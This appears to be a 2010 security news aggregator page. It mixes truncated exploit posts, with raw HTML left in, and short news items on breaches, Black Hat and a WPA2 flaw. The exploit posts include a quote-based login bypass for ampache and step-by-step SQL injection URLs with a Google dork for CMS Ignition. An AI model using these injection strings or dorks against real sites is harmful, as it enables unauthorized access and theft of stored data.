Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ampache Script Authentication Bypass</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================
ampache Script Authentication Bypass
====================================
# Date: [18/07/2010]
# Author: [walid]
# Software Link: [null]
# Version: [null]
# Tested on: [Windows]
# CVE: [null]
* Found By: WaLiD
* E-mail: Rezultas[at]Gmail[Dot]com
* GreeTZ: [All Hackerz mouslim]
———————————————————
Vendor: http://ampache.org
———————————————————
Exploit Auth Bypass:
login: walid
passw: ‘ or ‘ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>XAOS systems SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
XAOS systems SQL Injection Vulnerability
========================================
# Date: 25/07/2010
# Author: H-SK33PY
# Software Link: http://www.xaos.it/
# Version: N/A
# Google dork : Powered by XAOS systems
# Platform / Tested on: linux
# Category: webapplications
# Code : [SQLi] &amp; [BSQLi]
[...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Ballettin Forum SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
Ballettin Forum SQL Injection Vulnerability
===========================================
====================================================================
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
# Date: 25/07/2010
# Author: 3v0 aka evolution &lt;evolution ^ darkedition.com&gt;
# Software Link: http://www.ballettin.com
# Tested on: Windows Xp Pack 3
====================================================================
#1 – Vulnerable [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>CMS Ignition SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================
CMS Ignition SQL Injection Exploit
==================================
[+] SQL Injection Vulnerability
[+] Dorks: allinurl:&quot;shop.htm?shopMGID=&quot;
[+] Bug in shop.htm?shopMGID
[+] Exploit: http://www.site.com/shop.htm?shopMGID=XXXX (see below python exploit)
[+]
==================================================
Step[1]:
Error
http://www.site.com/shop.htm?shopMGID=9999′
Step[2]:
Number of columns
http://www.site.com/shop.htm?shopMGID=9999+order+by+1–
Step[3]:
Output of numbers
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,3,4,5–
Step[4]:
Collect informations
http://www.site.com/shop.htm?shopMGID=-9999+union+select+version(),database(),3,4,5+from+information_schema.columns–
Step[5]:
If version is
5.0.67-community
5.0.32-Debian_7etch8-log
5.0.40-log
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0×3a,table_schema,table_name,column_name),4,5+from+information_schema.columns–
Step[6]:
Increment zero in &quot;limit+0,1–&quot; until you have interesting [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>3dl.am script mtxkl raidrush Multiple Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
3dl.am script mtxkl raidrush Directory Traversal Vulnerability
==============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Oscommerce Max v2.0.25 by Pass / Creat ; Download Backup Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================================
Oscommerce Max v2.0.25 by Pass / Creat and Download Backup Vulnerability
========================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

If you have plans to travel to Las Vegas next week, you may want to cancel them. Why? Because the city will be crawling with hackers attending a "Black Hat" conference on electronic security. The sponsors of the events describe them as "highly technical information security conferences that bring together thought leaders from all facets [...]

Researchers at the University of Southern California have tipped our friend Graphene as the best material for electrodes in a new design for a flexible organic solar cell. The new design could lead to photovoltaics so flexible they could one day be made into fabric, the researchers say.
Researcher Gomez de Arco speculates: "They could [...]

The world of hackers can be roughly divided into three groups. â??Black hatsâ? break into corporate computer systems for fun and profit, taking credit card numbers and e-mail addresses to sell and trade with other hackers, while the â??white hatsâ? help companies stop their disruptive counterparts.
But it is the third group, the â??gray hats,â? that [...]

According to a report released by M86 Security Labs on July 14, 2010, the most exploited vulnerabilities are usually related to Internet Explorer and Adobe Reader, but the rising target for exploitation is Java, as reported by cnet news on July 14, 2010.
The lab in its recent security report for January-June 2010 has stated that [...]

Somebody peered electronically into a file server at the University of Texas at Arlington, leaving health data on 27,000 students, faculty and staff potentially exposed to snooping eyes, the school said Friday in a news release.
"We have no indication the data was downloaded," said Kristin Sullivan, the school’s assistant vice president for media relations, in [...]

Furtive web surfers might not be able to rely on their web browser’s private mode to hide their tracks.
Most web browsers offer a private mode, intended to leave no trace of surfing history on the computer. But Collin Jackson at Carnegie Mellon University in Pittsburgh, Pennsylvania, and colleagues, have found ways to detect which sites [...]

For the second time in two months, Mozilla on Friday rushed out a fix for Firefox to patch a problem with a browser update issued just days before.
Mozilla shipped Firefox 3.6.8 on Friday to patch a single security problem and deal with what Mike Beltzner, director of Firefox, called "a stability problem that affected some [...]

THE US Federal Trade Commission has been telling senators how it would be a jolly good idea if it could enforce the way that companies look after their customers’ privacy.
US House Subcommittee on Commerce, Trade, and Consumer Protection of the Committee on Energy and Commerce heard evidence from David Vladeck, director of the FTCâ??s Bureau [...]

Researchers at wireless security company AirTight Networks have uncovered a vulnerability in the widely used WPA2 security protocol, part of the 802.11 standard. The vulnerability, termed "Hole 196", which can be exploited by attackers already authenticated to the network, allows decryption of data sent by other users across the network.
Wireless encryption uses two keys to [...]

In tests conducted by German consumer group Stiftung Warentest, Apple’s iPhone 4 was shown to lose up to 90 per cent of its signal strength when held in such a manner that a finger obscures the antenna dimly located on the outsied of the gadget.
The outfit’s laboratory tests show that the fact that the antenna [...]

Wikileaks, the document-leaking organization that has previously released internal U.S. military videos, on Sunday disclosed over 75,000 confidential files related to the war in Afghanistan.
The group gave the documents in advance to the New York Times, Germany’s Der Spiegel, and the U.K.’s Guardian newspaper, which independently confirmed their authenticity. The Guardian called the disclosure a [...]

Internet Explorer 8’s Smartscreen Filter, used to secure users from dodgy websites, has stopped its one billionth malware download, Microsoft has proudly announced.
As with similar filters found on browsers such as Mozilla Firefox, the first thing that Smartscreen does for IE8 users is check each site visited against a whitelist of known good sites, further [...]

Security firm, AVG, says a two-month study has resulted in its discovery of a network of 1.2 million malware-infected computers controlled by cybercriminals who were using the Eleonore exploit toolkit, commercial attack software which enables cyber criminals to infect and monitor compromised PCs.
According to AVG it researched 165 Eleonore toolkits in use by cyber criminals [...]

Todd Davis is best known as the CEO of identity-theft protection company LifeLock who used his own Social Security number in his company’s advertising as a sign of his confidence in the service. In May, it was widely reported that Davis’s identity had been stolen at least 13 times. The controversy over LifeLock’s advertising ultimately [...]